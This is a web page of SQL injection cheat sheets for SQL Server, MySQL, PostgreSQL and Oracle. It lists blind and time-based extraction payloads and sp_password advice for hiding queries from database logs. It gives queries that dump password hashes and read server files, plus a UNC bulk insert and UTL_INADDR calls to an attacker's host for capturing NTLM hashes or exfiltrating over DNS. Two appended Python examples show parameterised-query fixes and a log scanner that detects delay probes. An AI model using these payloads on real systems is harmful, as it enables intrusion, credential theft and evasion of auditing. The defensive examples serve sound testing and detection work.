SQL injection quick query table (lower) and Oracle injection quick query table

Source: Internet
Author: User
Tags: md5 hash, mysql functions, sha1 hash

0x00 Contents

(The letters after a heading mark the engine it applies to, as used on this page: S = SQL Server, M = MySQL, P = PostgreSQL, O = Oracle.)

Blind injection
  About blind injection
  Blind injection in practice
  Time-delay blind injection
    WAITFOR DELAY [time] (S)
    BENCHMARK() (M)
    pg_sleep(seconds) (P)
  Covering tracks: sp_password log bypass (S)
Injection tests
Some other MySQL notes
MySQL functions
Advanced use of SQL injection
Forcing SQL Server to obtain an NTLM hash
Bulk insert from a UNC share (S)

0x01 Blind injection

About blind injection

In a complete, well-developed application you generally see no error messages, so you cannot extract data through UNION attacks or error messages. In the fully blind case you cannot see any difference in the response at all: the HTTP status code is the same and nothing visible changes for any input; you could only inject into logs or some other side channel, which is uncommon. In ordinary blind injection you can work with an IF statement or a WHERE-clause injection (generally relatively simple); in fully blind injection you need delay functions and have to analyse the response time. So you use WAITFOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in Oracle.

Blind injection in practice

The following output comes from a real private blind-injection tool testing an application with a SQL Server backend and enumerating table names. These requests determine the first character of the first table name. Because the attack is automated, the queries are somewhat more complex than strictly necessary. A binary search narrows down the ASCII code of the character. TRUE or FALSE marks whether the query returned true or false.

TRUE  : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE  : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE  : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE  : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN (SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--

(The "<" comparisons in the lower half of each pair were lost in the page extraction and are restored here so that the sequence matches the explanation that follows.)

 

Since the last two queries are both false, the ASCII code of the first character of the table name must be 80, that is, "P". This is blind injection by binary search. Another known method is to read the data one bit at a time. Each method is effective under different conditions.

Time-delay blind injection

Time delays are used only when there is no indicator at all (truly blind). Otherwise use the 1/0 (division by zero) method and tell the cases apart by the error. Also be careful with delays longer than 20 seconds: the connection between the application and the database, or the API, may time out.

WAITFOR DELAY [time] (S)

WAITFOR DELAY behaves like sleep: it waits for the specified time. Unlike a busy loop, it makes the database wait without burning CPU.

WAITFOR DELAY '0:0:10'--
You can also use WAITFOR DELAY '0:0:100'.
Am I sa?
if (select user) = 'sa' waitfor delay '0:0:10'

ProductID = 1; waitfor delay '0:0:10'--
ProductID = 1); waitfor delay '0:0:10'--
ProductID = 1'; waitfor delay '0:0:10'--
ProductID = 1'); waitfor delay '0:0:10'--

BENCHMARK() (M)

In general I do not like using this for MySQL delays. Be careful: it consumes server resources very quickly. BENCHMARK(howmanytimes, do this)
Am I root? Great!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000, MD5(1))
Check whether a table exists:
IF (SELECT * FROM login) BENCHMARK(1000000, MD5(1))

pg_sleep(seconds) (P)

Sleeps for the given number of seconds.
SELECT pg_sleep(10); -- sleep for ten seconds

Covering tracks: sp_password log bypass (S)

For security reasons SQL Server does not write queries containing this option into its logs (!). So if you add it to the query, the query will not appear in the database log. The web server's log will of course still exist, so use the POST method where you can.
0x02 Injection tests

These tests are simple and clear, and suit blind injection and quiet work.

product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1
product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Bo'||'ok (OM)
product.asp?name=Book' OR 'x'='x

0x03 Some other MySQL notes

Subqueries are only available from MySQL 4.1 onwards.
SELECT User, Password FROM mysql.user;
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2', BENCHMARK(100000, SHA1(1)), 0) User, Password FROM mysql.user WHERE User = 'root';

SELECT ... INTO DUMPFILE writes the query result to a new file (existing files cannot be modified).

UDF functions:
CREATE FUNCTION LockWorkStation RETURNS INTEGER SONAME 'user32'; SELECT LockWorkStation();
CREATE FUNCTION ExitProcess RETURNS INTEGER SONAME 'kernel32'; SELECT exitprocess();

SELECT USER();
SELECT password, USER() FROM mysql.user;
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;

Reading files:
query.php?user=1+union+select+load_file(0x63...),1,1,1
MySQL does not enable file reading by default!
CREATE TABLE foo (line BLOB); LOAD DATA INFILE 'C:/boot.ini' INTO TABLE foo; SELECT * FROM foo;

Various delays in MySQL:
select benchmark(500000, sha1('test'));
query.php?user=1+union+select+benchmark(500000,sha1(0x414141)),1,1,1
select if(user() like 'root@%', benchmark(100000, sha1('test')), 'false');
Enumerating data, brute force:
select if((ascii(substring(user(),1,1))>>7)&1, benchmark(100000, sha1('test')), 'false');

MySQL's useful functions

MD5()        MD5 hash
SHA1()       SHA1 hash
PASSWORD()
ENCODE()
COMPRESS()   compresses data; useful for reading a large amount of data during blind injection
ROW_COUNT()
SCHEMA()
VERSION()    same as @@version

0x04 Advanced use of SQL injection
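The injection tests above (the arithmetic `5-1`, the concatenation `Bo'||'ok` and the tautology `Book' OR 'x'='x`) all work for one reason: the parameter is spliced into the statement as text. The following added example, which is not part of the original page, shows each test against a vulnerable lookup and against a parameterised version of the same lookup, using Python's built-in sqlite3 so it runs offline; the schema, the product rows and the `users` table are constructed for the demo. It also goes one step further and covers the stored-value ("hidden layer") case described in the next section, where the value is written safely but reused unsafely later, so the page's `'+(select top 1 password FROM users)+'` payload is re-spelled for SQLite with `||` and `LIMIT`.

```python
import sqlite3

# Constructed demo schema, not from the page: a product table looked up by id
# and by name (the targets of the tests above) and a users table for the
# stored-value case.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO product (name) VALUES ('Book'), ('Pen'), ('Lamp'), ('Cup');
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users (name, password) VALUES ('alice', 'alice-secret');
    """)
    return db

# --- numeric parameter: product.asp?id=5-1 ---------------------------------

def product_by_id_vulnerable(db, id_text):
    # The raw query-string value is spliced into the statement, so '5-1' is
    # evaluated as arithmetic and '4 OR 1=1' as a boolean expression.
    row = db.execute("SELECT name FROM product WHERE id = " + id_text + " ORDER BY id").fetchone()
    return row[0] if row else None

def product_by_id_hardened(db, id_text):
    # Validate the type first, then bind; anything that is not an integer is rejected.
    try:
        product_id = int(id_text)
    except ValueError:
        return None
    row = db.execute("SELECT name FROM product WHERE id = ?", (product_id,)).fetchone()
    return row[0] if row else None

# --- string parameter: product.asp?name=Bo'||'ok ---------------------------

def products_by_name_vulnerable(db, name):
    # Quote-delimited concatenation: "Bo'||'ok" becomes the expression
    # 'Bo'||'ok' and matches Book, and "Book' OR 'x'='x" matches every row.
    sql = "SELECT name FROM product WHERE name = '" + name + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def products_by_name_hardened(db, name):
    # Bound parameter: the input is compared as data, never parsed as SQL.
    return [row[0] for row in db.execute(
        "SELECT name FROM product WHERE name = ? ORDER BY id", (name,))]

# --- second-order ("hidden layer"): a stored value reused unsafely ---------

# The page's payload is written for SQL Server ('+...+'); this is its SQLite
# spelling, using || for concatenation and LIMIT instead of TOP.
SECOND_ORDER_PAYLOAD = "'||(SELECT password FROM users ORDER BY id LIMIT 1)||'"

def register(db, name):
    # The write itself is parameterised and therefore not injectable.
    return db.execute("INSERT INTO users (name, password) VALUES (?, 'x')", (name,)).lastrowid

def greeting_vulnerable(db, user_id):
    # A later step trusts the stored name because it "came from the database"
    # and splices it into a new statement: the injection fires here.
    name = db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    return db.execute("SELECT 'Hello ' || '" + name + "'").fetchone()[0]

def greeting_hardened(db, user_id):
    # Stored values are still untrusted data: bind them every time they are used.
    name = db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    return db.execute("SELECT 'Hello ' || ?", (name,)).fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    for value in ("4", "5-1", "4 OR 1=1"):
        print(repr(value), product_by_id_vulnerable(db, value), product_by_id_hardened(db, value))
    for value in ("Book", "Bo'||'ok", "Book' OR 'x'='x"):
        print(repr(value), products_by_name_vulnerable(db, value), products_by_name_hardened(db, value))
    uid = register(db, SECOND_ORDER_PAYLOAD)
    print(greeting_vulnerable(db, uid))
    print(greeting_hardened(db, uid))
```

The tell-tale sign a tester looks for, and that a reviewer should look for in code, is that `5-1` and `4`, or `Bo'||'ok` and `Book`, produce identical results: that only happens when the database evaluated the input. With the bound-parameter versions the odd inputs simply match nothing, and the second-order greeting echoes the stored string literally instead of the first user's password.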
Usually you inject somewhere and expect the input not to be filtered. There is a level most people do not notice: the hidden layer problem. Register with

Name:  '+(select top 1 password FROM users)+'
Email: ...

If the application stores the name insecurely, or uses it insecurely in a later step, the first user's password is written into your name field.

Forcing SQL Server to obtain an NTLM hash

This attack can help you obtain the Windows password of the target SQL Server, although the connection may be blocked by a firewall. It is very useful in a penetration test. We force the SQL Server to connect to a Windows UNC share of ours and capture the NTLM session with packet-capture software (Cain & Abel).

Bulk insert from a UNC share (S)

bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

II. Oracle injection lookup table

This part was translated by Yinzo; keep the attribution when reposting. Original article: http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

Note: some of the queries below can only be executed by an administrator. They are marked "-- priv" at the end of the query.

Version:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Comments:
SELECT 1 FROM dual -- comment
Note: an Oracle SELECT must contain a FROM clause, so when you are not really querying a table you must use the dummy table 'dual'.

Current user:
SELECT user FROM dual

List users:
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv

List password hashes:
SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g; astatus gives the account status
SELECT name, spare4 FROM sys.user$ -- priv, 11g

Password cracking:
checkpwd can crack the DES-based hashes of Oracle 8, 9 and 10.

List privileges:
SELECT * FROM session_privs; -- current privileges
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privileges
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular privilege
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA accounts:
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs

Current database:
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM dual;

List databases:
SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
-- Other databases are reached through the TNS listener; see tnscmd for more information.

List columns:
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List tables:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;

Find a table from a column name:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- note: table names are uppercase

Select the Nth row:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r = 9; -- gets the 9th row

Select the Nth character (counting from 1):
SELECT substr('abc', 3, 1) FROM dual; -- gets the third character, 'c'

Bitwise AND:
SELECT bitand(6, 2) FROM dual; -- returns 2
SELECT bitand(6, 1) FROM dual; -- returns 0

ASCII value to character:
SELECT chr(65) FROM dual; -- returns A

Character to ASCII value:
SELECT ascii('A') FROM dual; -- returns 65

Casting:
SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;

String concatenation:
SELECT 'A' || 'B' FROM dual; -- returns AB

IF statement:
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- does not combine well with SELECT statements

CASE statement:
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding quotes:
SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time delays:
BEGIN DBMS_LOCK.SLEEP(5); END; -- priv
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered or slow
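The time-delay primitives this page lists for SQL Server, MySQL and PostgreSQL (section 0x01) and for Oracle (the time-delay entries just above) share a property a defender can use: the delay has to appear in the request, and the response is then measurably slow. The sp_password note cuts the other way, since a query carrying it never reaches the database log, which leaves the web tier as the only record. The following added example, not from the original page, is a small log scanner that decodes each request URI, matches it against those primitives and pairs the hit with the recorded response time; the log lines and the combined-log-with-response-time format are constructed for the example, and the 5-second "slow" threshold is an assumption to tune per application.

```python
import re
from urllib.parse import unquote_plus

# Delay and log-suppression primitives listed on this page, one pattern per
# engine. Input is lower-cased and whitespace-collapsed before matching.
SIGNATURES = {
    "mssql_waitfor":     re.compile(r"waitfor\s+delay\s+'"),
    "mssql_sp_password": re.compile(r"\bsp_password\b"),
    "mysql_benchmark":   re.compile(r"\bbenchmark\s*\("),
    "pgsql_pg_sleep":    re.compile(r"\bpg_sleep\s*\("),
    "oracle_dbms_lock":  re.compile(r"dbms_lock\.sleep\s*\("),
    "oracle_utl_inaddr": re.compile(r"utl_inaddr\.get_host_(?:name|address)\s*\("),
    "oracle_utl_http":   re.compile(r"utl_http\.request\s*\("),
}

# Combined-log-format line with the response time in seconds appended as the
# last field (what nginx's $request_time gives). Constructed for this example;
# adjust LOG_RE to your own format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$'
)

def normalise(uri):
    # Undo one layer of %xx / '+' encoding and collapse whitespace so the
    # patterns see plain SQL regardless of how the request was encoded.
    return re.sub(r"\s+", " ", unquote_plus(uri)).lower()

def analyse_line(line, slow_threshold=5.0):
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = normalise(m.group("uri"))
    rt = float(m.group("rt"))
    return {
        "ip": m.group("ip"),
        "uri": uri,
        "status": int(m.group("status")),
        "hits": [name for name, rx in SIGNATURES.items() if rx.search(uri)],
        "response_time": rt,
        "slow": rt >= slow_threshold,
    }

def scan(log_text, slow_threshold=5.0):
    # Keep a record when it carries a delay signature or was unusually slow;
    # both together is the strongest indicator of time-based probing.
    findings = []
    for line in log_text.splitlines():
        rec = analyse_line(line, slow_threshold)
        if rec and (rec["hits"] or rec["slow"]):
            findings.append(rec)
    return findings

def per_source(findings):
    # Count flagged requests per client address.
    counts = {}
    for rec in findings:
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts

# Constructed sample log lines (not real traffic): one benign request followed
# by probes built from the primitives listed on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /product.asp?id=4 HTTP/1.1" 200 2326 0.012
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /product.asp?id=1;waitfor+delay+'0:0:10'-- HTTP/1.1" 200 2326 10.031
203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /query.php?user=1+union+select+benchmark(500000,sha1(0x414141)),1,1,1 HTTP/1.1" 200 511 4.207
203.0.113.5 - - [10/Oct/2023:13:55:53 +0000] "GET /report?q=1%3Bselect%20pg_sleep(10)-- HTTP/1.1" 500 0 10.004
203.0.113.5 - - [10/Oct/2023:13:56:04 +0000] "GET /search?name=x'%7C%7CUTL_INADDR.get_host_name('10.0.0.1')%7C%7C' HTTP/1.1" 200 812 6.5
203.0.113.5 - - [10/Oct/2023:13:56:11 +0000] "GET /product.asp?id=1--sp_password HTTP/1.1" 200 2326 0.020
"""

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["response_time"], rec["hits"], rec["uri"])
    print(per_source(scan(SAMPLE_LOG)))
```

Two design points matter in practice. First, the signature and the latency are checked independently: the BENCHMARK line above is flagged on its signature even though it stayed under the threshold (the page's own warning that BENCHMARK load is unpredictable is why), and a slow request with no signature is still kept, because comment tricks or a second layer of encoding would defeat the patterns while the delay itself cannot hide. Second, only GET query strings are visible here; as the sp_password note says, the same probe sent by POST leaves nothing in the access log, so request bodies have to be logged at the application or WAF layer to close that gap.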